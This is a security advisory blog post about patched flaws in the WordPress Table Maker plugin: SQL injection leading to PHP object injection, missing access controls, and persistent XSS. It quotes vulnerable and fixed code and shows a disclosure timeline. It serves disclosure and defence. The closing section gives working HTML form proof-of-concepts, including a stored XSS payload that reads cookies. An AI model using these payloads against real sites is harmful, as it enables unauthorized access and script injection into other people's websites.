Is This What a Hacker Would Be Targeting the Table Maker Plugin For?

Last week we mentioned that we had recently seen what looked to be probing for the usage of the SendinBlue Subscribe Form And WP SMTP and another plugin. That other plugin is Table Maker, which we had been seeing requests for its readme.txt like this: /wp-content/plugins/table-maker/readme.txt. One of the few possible explanations for requests like that is that someone is probing for usage of the plugin to know what websites to exploit through a vulnerability in the plugin.

In SendinBlue we found a SQL injection vulnerability that matches claims of hackers targeting SQL injection vulnerabilities in code whose result is then passed to the unserialize() function. We have yet to see any evidence that the claims are true, but whether they are true or not, it might explain a hacker’s interest (hackers have been known to target vulnerabilities that don’t actually exist). In looking over Table Maker we found several security issues that involve code around a similar issue, but we didn’t find something that would be obvious for a hacker to exploit. If you see some other issues that hackers might be targeting we would love to hear about it.

Update (December 20): Thanks to some help from J.D. Grimes in the comments of this post, we have now figure out how PHP object injection could have occurred through SQL injection issue mentioned later in the post, which seems like it would be what a hacker would have been interested targeting in the plugin.

Unlike SendinBlue the developer of Table Maker has now fixed the issues we noticed.

As of version 1.6, the function get() in /inc/class-wpsm-db-table.php improperly handled the security of a SQL statement that had its result unserialized:

public function get($id){
	if( is_array($id) ){
		$id = sprintf('(%s)', implode(',', $id));
	}
	else {
		$id = sprintf('(%d)', $id);
	}
	$row = $this->db->get_row("SELECT * FROM $this->table_name WHERE id IN $id", ARRAY_A);
	if($row){
		$row['tvalues'] = $this->unserialize($row['tvalues']);

Since the value of $id can come from user input, a prepared statement should be used when generating the SQL statement in that to prevent the possibility the input could include SQL code that would run when SQL statement in it is processed. We couldn’t find a way that could be exploited though, since unless you can cause the value of $id to be seen as an array, it is limited to an integer in the SQL statement. In version 1.9 that was changed to use a prepared statement:

public function get($id){
	$query = $this->db->prepare("SELECT * FROM $this->table_name WHERE id IN (%d)", $id);
	$row = $this->db->get_row($query, ARRAY_A);
	if($row){
		$row['tvalues'] = $this->unserialize($row['tvalues']);

We should note here that unserialize being used in the above code is not PHP’s, but this:

123
124
125

private function unserialize($item){
	return unserialize(base64_decode($item));
}

When we looked around at where that function gets called and therefore what the value being passed to it could be, we noticed another security issue.

The function xml_download() ran when WordPress generates pages as it ran once WordPress has loaded activated plugins:

30	add_action('plugins_loaded', array($this, 'xml_download'));

That function then allowed anyone access to the get() function:

395
396
397

function xml_download() {
	if(isset($_POST['wpsm-export-table'])) {
		$result = $this->db->get( $_GET['table'] );

We didn’t see away that could pass something that is seen as an array with that.

That function will export an XML copy of a table made through the plugin. The only place it looks like their UI for doing that is in the plugin’s admin page, which was usually limited to only those logged in as Administrators, while the code allows even those not logged in to do that export. That would probably be of little concern if all of the tables are publicly accessible, but in other instances it could be of more concern. The lack of proper restrictions on access to the plugin’s admin functionality was not restricted to this code though.

That was fixed by moving its functionality in the next piece of code we will focus on.

After looking at how it might be possible to cause SQL injection occur in the code shown earlier, we started looking at if it would be possible for an attacker to set the value that would be pulled from the database and the unserialized instead. What we found as we looked over things is that the plugin had handled requests in the admin area insecurely in way that is common enough that just that type of issue is something that we know check for during security reviews of plugin that we do as part of our service and separately.

The plugin registered the function handle_requests() to run during admin_init:

29	add_action( 'admin_init', array($this, 'handle_requests') );

What is very important to understand about that is that when accessing certain URLs that will cause the function to run even if the requester was not logged in to WordPress. That can lead to serious issue if the code does not have proper security checks in place, which was the case with this plugin.

The only restriction before getting to functionality of that function was to check to see if the function is_plugin_page() returns true:

305
306
307

public function handle_requests() {
	if( !$this->is_plugin_page() )
		return;

All of the things that checked can be true without being logged in:

private function is_plugin_page() {
	if( !is_admin() || !isset($_GET['page']) || $this->page_slug != $_GET['page'] || (!isset($_GET['action']) && !isset($_GET['action2'])) )
		return false;
	return true;
}

The rest of the code in handle_requests() allows for adding, editing, deleting, and importing tables into the plugin.

As far as we could find though that wouldn’t allow for setting a value passed to unserialize() that could be used for PHP object injection though. Though maybe someone else sees how that can be done, so let’s go through an example of what happens in that function.

Here is the code in it for adding a new table:

if($_GET['action'] == 'add' && isset($_POST['wpsm-create-table'])){
	if (!isset ($_POST['table_respon'])) {$_POST['table_respon'] = '';}
	$result = $this->db->add( $_POST['table_name'], $_POST['table_rows'], $_POST['table_cols'],  $_POST['table_subs'], $_POST['table_color'], $_POST['table_respon'], $_POST['table_values'] );
	if($result){
		$sendback = add_query_arg( array( 'page' => $_GET['page'], 'action' => 'edit', 'table' => $result, 'added' => true ), '' );
		wp_redirect($sendback);
	}
}

The POST input “table_values” is the starting place for the “tvalues” being unserialized in the other code. When the function that is passed to, add(), it gets run through serialize():

public function add($name, $rows, $cols, $subs, $color, $responsive, $tvalues){
	$name 	= wp_strip_all_tags(wp_unslash($name));
	$rows 		= intval(wp_unslash($rows));
	$cols 		= intval(wp_unslash($cols));
	$subs 		= strval(wp_unslash($subs));
	$color 		= strval(wp_unslash($color));
	$responsive 		= intval(wp_unslash($responsive));
	$tvalues 	= $this->serialize(wp_unslash($tvalues));
 
	$result = $this->db->insert( $this->table_name, array('name' => $name, 'rows' => $rows, 'cols' => $cols, 'subs' => $subs, 'color' => $color, 'responsive' => $responsive, 'tvalues' => $tvalues ) );

Like unserialize, that is not the PHP version, but this:

119
120
121

private function serialize($item){
	return base64_encode(serialize($item));
}

We didn’t see how we could pass a value that would cause PHP object injection through that code, since it would need to be unserialized when passed through it.

The ability to add or edit tables also allowed persistent cross-site scripting (XSS) to occur.

In version 1.9 the rest of the code in the function handle_request() will only run if the user has the “publish_posts” capability and they are visiting plugin’s admin page:

298
299
300

public function handle_requests($current_screen) {
 
	if(current_user_can('publish_posts') && $current_screen->base == 'toplevel_page_wpsm_table_maker') { //Check if user have enough rights

There was code added to prevent cross-site request forgery (CSRF) when taking actions through that.

As we were preparing this post we noticed that because Author level users can now access the admin page for the plugin (they were previously limited Administrator users), there is an issue with authenticated cross-site scripting (XSS), which we will be notify them of.

Wider Warning

Due to the fact that the privilege escalation issue might be being targeted by hackers (and it impacted all previous version) we are adding it to the free data that comes with our service’s companion plugin, so that even those not using our service yet can be warned if they are using an older version of the Table Maker.

Proof of Concepts

Information Disclosure

The following proof of concept will cause an XML copy of a specified table to be offered for download.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[table ID]” with the ID of table to be downloaded.

<html>
<body>
<form action="http://[path to WordPress]/?table=[table ID]" method="POST">
<input type="hidden" name="wpsm-export-table" />
<input type="submit" value="Submit" />
</form>
</body>

Privilege Escalation

The following proof of concept will create a new table.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action='http://[path to WordPress]/wp-admin/admin-post.php?page=wpsm_table_maker&action=add&action2=' method="POST">
<input type="hidden" name="wpsm-create-table" />
<input type="hidden" name="table_name" value="Test" />
<input type="hidden" name="table_values" value="Test" />
<input type="submit" value="Submit" />
</form>
</body>

Persistent Cross-Site Scripting (XSS)

The following proof of concept will cause any available cookies to be shown in an alert box when visiting the page /wp-admin/admin.php?page=wpsm_table_maker.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action='http://[path to WordPress]/wp-admin/admin-post.php?page=wpsm_table_maker&action=add&action2=' method="POST">
<input type="hidden" name="wpsm-create-table" />
<input type="hidden" name="table_name" value="Test" />
<input type="hidden" name="table_values" value="Test" />
<input type="hidden" name="table_subs" value='<script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>

Timeline

December 12, 2017 – Developer notified.
December 13, 2017 – Developer responds.
December 18, 2017 – Version 1.9, which fixes issues.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

2 thoughts on “Is This What a Hacker Would Be Targeting the Table Maker Plugin For?”

John - December 19, 2017 at 6:18 pm

Making $_GET['table'] an array should be possible using a query string like table[]=payload, I think. Unless there is some other code that is requiring $_GET['table'] to be a scalar value.

- Plugin Vulnerabilities - December 20, 2017 at 9:56 am
  
  That worked perfectly and we have now confirmed the PHP object injection could have occurred through that SQL injection vulnerability. We will have post that further details that later. Thank you.